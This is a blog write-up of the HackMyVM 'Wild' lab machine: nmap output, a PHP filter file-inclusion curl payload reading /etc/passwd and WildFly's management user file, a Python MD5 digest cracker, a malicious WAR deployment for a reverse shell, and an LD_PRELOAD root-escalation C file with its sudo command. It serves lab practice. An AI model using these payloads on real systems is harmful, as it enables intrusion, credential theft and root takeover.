Open in app

Sign in

Write

Sign in

HackMyVM : Wild

mrwhitecap
7 min readFeb 16, 2024

--

Wild

Nmap :

└─$ nmap -sC -sV 192.168.1.8
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-15 17:13 EST
Nmap scan report for 192.168.1.8
Host is up (0.00060s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH 9.2p1 Debian 2 (protocol 2.0)
| ssh-hostkey: 
|   256 dd:83:da:cb:45:d3:a8:ea:c6:be:19:03:45:76:43:8c (ECDSA)
|_  256 e5:5f:7f:25:aa:c0:18:04:c4:46:98:b3:5d:a5:2b:48 (ED25519)
80/tcp   open  http          Apache httpd 2.4.57 ((Debian))
|_http-server-header: Apache/2.4.57 (Debian)
|_http-title: burger html5 landing page
8080/tcp open  http-proxy
|_http-open-proxy: Proxy might be redirecting requests
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     Connection: close
|     Content-Length: 74
|     Content-Type: text/html
|     Date: Thu, 15 Feb 2024 22:14:06 GMT
|     <html><head><title>Error</title></head><body>404 - Not Found</body></html>
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Connection: close
|     Last-Modified: Wed, 18 Oct 2023 06:43:38 GMT
|     Content-Length: 1590
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Date: Thu, 15 Feb 2024 22:14:06 GMT
|     <!--
|     Copyright The WildFly Authors
|     SPDX-License-Identifier: Apache-2.0
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <!-- proper charset -->
|     <meta http-equiv="content-type" content="text/html;charset=utf-8" />
|     <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
|     <title>Welcome to WildFly</title>
|     <link rel="shortcut icon" href="favicon.ico" type="image/x-icon">
|     <link rel="StyleSheet" href="wildfly.css" type="text/css">
|     </head>
|     <body>
|     <div class="wrapper">
|     <div class="content">
|     <div class="logo">
|     <img src="wildfly_logo.png" alt="WildFly" border="0" />
|     </div>
|     <h1>Welcome to WildFly</h1>
|     <h3>Your WildFly instance is ru
|   HTTPOptions: 
|     HTTP/1.1 405 Method Not Allowed
|     Allow: GET, HEAD, POST
|     Connection: close
|     Content-Length: 83
|     Content-Type: text/html
|     Date: Thu, 15 Feb 2024 22:14:06 GMT
|     <html><head><title>Error</title></head><body>405 - Method Not Allowed</body></html>
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Content-Length: 0
|_    Connection: close
|_http-title: Welcome to WildFly
8443/tcp open  ssl/https-alt
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2024-02-15T22:01:24
|_Not valid after:  2034-02-12T22:01:24
| tls-alpn: 
|_  http/1.1
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     Connection: close
|     Content-Length: 74
|     Content-Type: text/html
|     Date: Thu, 15 Feb 2024 22:14:12 GMT
|     <html><head><title>Error</title></head><body>404 - Not Found</body></html>
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Connection: close
|     Last-Modified: Wed, 18 Oct 2023 06:43:38 GMT
|     Content-Length: 1590
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Date: Thu, 15 Feb 2024 22:14:12 GMT
|     <!--
|     Copyright The WildFly Authors
|     SPDX-License-Identifier: Apache-2.0
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <!-- proper charset -->
|     <meta http-equiv="content-type" content="text/html;charset=utf-8" />
|     <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
|     <title>Welcome to WildFly</title>
|     <link rel="shortcut icon" href="favicon.ico" type="image/x-icon">
|     <link rel="StyleSheet" href="wildfly.css" type="text/css">
|     </head>
|     <body>
|     <div class="wrapper">
|     <div class="content">
|     <div class="logo">
|     <img src="wildfly_logo.png" alt="WildFly" border="0" />
|     </div>
|     <h1>Welcome to WildFly</h1>
|     <h3>Your WildFly instance is ru
|   HTTPOptions: 
|     HTTP/1.1 405 Method Not Allowed
|     Allow: GET, HEAD, POST
|     Connection: close
|     Content-Length: 83
|     Content-Type: text/html
|     Date: Thu, 15 Feb 2024 22:14:12 GMT
|_    <html><head><title>Error</title></head><body>405 - Method Not Allowed</body></html>
|_http-title: Welcome to WildFly
|_ssl-date: TLS randomness does not represent time
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8080-TCP:V=7.94%I=7%D=2/15%Time=65CE8CAD%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,6F4,"HTTP/1\.1\x20200\x20OK\r\nConnection:\x20close\r\nLast-Mo
SF:dified:\x20Wed,\x2018\x20Oct\x202023\x2006:43:38\x20GMT\r\nContent-Leng
SF:th:\x201590\r\nContent-Type:\x20text/html\r\nAccept-Ranges:\x20bytes\r\
SF:nDate:\x20Thu,\x2015\x20Feb\x202024\x2022:14:06\x20GMT\r\n\r\n<!--\n\x2
SF:0\x20~\x20Copyright\x20The\x20WildFly\x20Authors\n\x20\x20~\x20SPDX-Lic
SF:ense-Identifier:\x20Apache-2\.0\n\x20\x20-->\n\n<!DOCTYPE\x20html>\n\n<
SF:html>\n<head>\n\x20\x20\x20\x20<!--\x20proper\x20charset\x20-->\n\x20\x
SF:20\x20\x20<meta\x20http-equiv=\"content-type\"\x20content=\"text/html;c
SF:harset=utf-8\"\x20/>\n\x20\x20\x20\x20<meta\x20http-equiv=\"X-UA-Compat
SF:ible\"\x20content=\"IE=EmulateIE8\"\x20/>\n\n\x20\x20\x20\x20<title>Wel
SF:come\x20to\x20WildFly</title>\n\x20\x20\x20\x20<link\x20rel=\"shortcut\
SF:x20icon\"\x20href=\"favicon\.ico\"\x20type=\"image/x-icon\">\n\x20\x20\
SF:x20\x20<link\x20rel=\"StyleSheet\"\x20href=\"wildfly\.css\"\x20type=\"t
SF:ext/css\">\n</head>\n\n<body>\n<div\x20class=\"wrapper\">\n\x20\x20\x20
SF:\x20<div\x20class=\"content\">\n\x20\x20\x20\x20\x20\x20\x20\x20<div\x2
SF:0class=\"logo\">\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20<img\x20src=\"wildfly_logo\.png\"\x20alt=\"WildFly\"\x20bord
SF:er=\"0\"\x20/>\n\x20\x20\x20\x20\x20\x20\x20\x20</div>\n\x20\x20\x20\x2
SF:0\x20\x20\x20\x20<h1>Welcome\x20to\x20WildFly</h1>\n\n\x20\x20\x20\x20\
SF:x20\x20\x20\x20<h3>Your\x20WildFly\x20instance\x20is\x20ru")%r(HTTPOpti
SF:ons,F3,"HTTP/1\.1\x20405\x20Method\x20Not\x20Allowed\r\nAllow:\x20GET,\
SF:x20HEAD,\x20POST\r\nConnection:\x20close\r\nContent-Length:\x2083\r\nCo
SF:ntent-Type:\x20text/html\r\nDate:\x20Thu,\x2015\x20Feb\x202024\x2022:14
SF::06\x20GMT\r\n\r\n<html><head><title>Error</title></head><body>405\x20-
SF:\x20Method\x20Not\x20Allowed</body></html>")%r(RTSPRequest,42,"HTTP/1\.
SF:1\x20400\x20Bad\x20Request\r\nContent-Length:\x200\r\nConnection:\x20cl
SF:ose\r\n\r\n")%r(FourOhFourRequest,C9,"HTTP/1\.1\x20404\x20Not\x20Found\
SF:r\nConnection:\x20close\r\nContent-Length:\x2074\r\nContent-Type:\x20te
SF:xt/html\r\nDate:\x20Thu,\x2015\x20Feb\x202024\x2022:14:06\x20GMT\r\n\r\
SF:n<html><head><title>Error</title></head><body>404\x20-\x20Not\x20Found<
SF:/body></html>");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8443-TCP:V=7.94%T=SSL%I=7%D=2/15%Time=65CE8CB4%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,6F4,"HTTP/1\.1\x20200\x20OK\r\nConnection:\x20close\r\nL
SF:ast-Modified:\x20Wed,\x2018\x20Oct\x202023\x2006:43:38\x20GMT\r\nConten
SF:t-Length:\x201590\r\nContent-Type:\x20text/html\r\nAccept-Ranges:\x20by
SF:tes\r\nDate:\x20Thu,\x2015\x20Feb\x202024\x2022:14:12\x20GMT\r\n\r\n<!-
SF:-\n\x20\x20~\x20Copyright\x20The\x20WildFly\x20Authors\n\x20\x20~\x20SP
SF:DX-License-Identifier:\x20Apache-2\.0\n\x20\x20-->\n\n<!DOCTYPE\x20html
SF:>\n\n<html>\n<head>\n\x20\x20\x20\x20<!--\x20proper\x20charset\x20-->\n
SF:\x20\x20\x20\x20<meta\x20http-equiv=\"content-type\"\x20content=\"text/
SF:html;charset=utf-8\"\x20/>\n\x20\x20\x20\x20<meta\x20http-equiv=\"X-UA-
SF:Compatible\"\x20content=\"IE=EmulateIE8\"\x20/>\n\n\x20\x20\x20\x20<tit
SF:le>Welcome\x20to\x20WildFly</title>\n\x20\x20\x20\x20<link\x20rel=\"sho
SF:rtcut\x20icon\"\x20href=\"favicon\.ico\"\x20type=\"image/x-icon\">\n\x2
SF:0\x20\x20\x20<link\x20rel=\"StyleSheet\"\x20href=\"wildfly\.css\"\x20ty
SF:pe=\"text/css\">\n</head>\n\n<body>\n<div\x20class=\"wrapper\">\n\x20\x
SF:20\x20\x20<div\x20class=\"content\">\n\x20\x20\x20\x20\x20\x20\x20\x20<
SF:div\x20class=\"logo\">\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20<img\x20src=\"wildfly_logo\.png\"\x20alt=\"WildFly\"\x
SF:20border=\"0\"\x20/>\n\x20\x20\x20\x20\x20\x20\x20\x20</div>\n\x20\x20\
SF:x20\x20\x20\x20\x20\x20<h1>Welcome\x20to\x20WildFly</h1>\n\n\x20\x20\x2
SF:0\x20\x20\x20\x20\x20<h3>Your\x20WildFly\x20instance\x20is\x20ru")%r(HT
SF:TPOptions,F3,"HTTP/1\.1\x20405\x20Method\x20Not\x20Allowed\r\nAllow:\x2
SF:0GET,\x20HEAD,\x20POST\r\nConnection:\x20close\r\nContent-Length:\x2083
SF:\r\nContent-Type:\x20text/html\r\nDate:\x20Thu,\x2015\x20Feb\x202024\x2
SF:022:14:12\x20GMT\r\n\r\n<html><head><title>Error</title></head><body>40
SF:5\x20-\x20Method\x20Not\x20Allowed</body></html>")%r(FourOhFourRequest,
SF:C9,"HTTP/1\.1\x20404\x20Not\x20Found\r\nConnection:\x20close\r\nContent
SF:-Length:\x2074\r\nContent-Type:\x20text/html\r\nDate:\x20Thu,\x2015\x20
SF:Feb\x202024\x2022:14:12\x20GMT\r\n\r\n<html><head><title>Error</title><
SF:/head><body>404\x20-\x20Not\x20Found</body></html>");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 81.19 seconds

Port 80:

Visited : http://192.168.1.8

Found the recipe.php in dirbuster search.

Visited : http://192.168.1.8/recipe.php

Got three pages more..

Lets check Fatty burger.

Looks like php://filter

Reference : https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#wrapper-phpfilter

$ curl http://192.168.1.8/recipe.php?file=pHp://FilTer/convert.base64-encode/resource=/etc/passwd

Lets decode that base64..

Its working..

Port 8080:

Visited : http://192.168.1.8:8080/

Clicked on the Administrative Console and got redirected to http://192.168.1.8:9990/console/index.html

Visited : http://192.168.1.8:9990/console/index.html

Visited : https://docs.wildfly.org/19/Admin_Guide.html#security-realm-authentication

In the wildfly, we got many different directories in machines, where the properties are stored, So lets find the directory where the interesting things are…

After many tries I found

/opt/wildfly/domain/configuration/mgmt-users-properties have some interesting thing for us

$ curl http://192.168.1.11/recipe.php?file=pHp://FilTer/convert.base64-encode/resource=/opt/wildfly/domain/configuration/mgmt-users.properties

Got the base64

Lets decode it..

administrator=3bfa7f34174555fe766d0e0295821742

Got the hash for user administrator.

So, we wrote the python script to decode the above md5 hash.

hash.py

import hashlib

def generate_has(username, realm, password):
        concat_str = f"{username}:{realm}:{password}"
        return hashlib.md5(concat_str.encode('utf-8')).hexdigest()

def main():
        username = "administrator"
        realm = "ManagementRealm"
        known_hash = "3bfa7f34174555fe766d0e0295821742"

        password_file = "rockyou.txt"

        try:
                with open(password_file, 'rb') as file:
                        for line_b in file:
                                try:
                                        line = line_b.decode('utf-8').strip()
                                except UnicodeDecodeError:
                                        try:
                                                line=line_b.decode('latin1').strip()
                                        except UnicodeDecodeError:
                                                print("Skipping a line a undecodable character")
                                                continue

                                current_hash = generate_has(username ,realm, line)
                                if current_hash == known_hash:
                                        print(f"Password Found: {line}")
                                        break
        except FileNoFoundError:
                print(f"File not found:{password_file}")

if __name__ == "__main__":
        main()

After running python file…

Our python script decoded the hash successfully.

administrator : katarina9

Using those administrator creds we logged in to the console…

In the deployment page, that we can only deploy EJB-jar, war, ear files

SO lets make a malicious war file to deploy to console.

Reference : https://github.com/KINGSABRI/godofwar

Found on google search..

Lets install godofwar and create a shell.war file to get the reverse shell.

Create the shell.war

Lets click on upload deployment and select the shell.war file.

Then access shell.jsp through the web after opening netcat listener on the given port number.

Received the reverse shell.

Lets check SUID permissions…

Created the exploit.c file in target machine

exploit.c

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash -p");
}

Compile the exploit. c using :

$ gcc -fPIC -shared -o exploit.so exploit.c -nostartfiles

exploit.c successfully compiled.

It gives us the exploit.so as our output file.

Lets run that exploit.so file using /usr/bin/info

$ sudo LD_PRELOAD=./exploit.so /usr/bin/info

Boom! Rooted…

Hackmyvm
Hackmyvm Wild
Wild
Penetration Testing
Hacking

--

--

mrwhitecap

Written by mrwhitecap

17 Followers

Hey, MRWhiteCap here…

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams